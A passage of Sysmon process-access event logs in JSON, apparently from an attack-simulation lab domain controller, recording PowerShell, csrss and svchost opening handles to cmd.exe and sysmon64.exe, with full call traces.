#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001027D90800}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001027D90800}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001027D90800}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 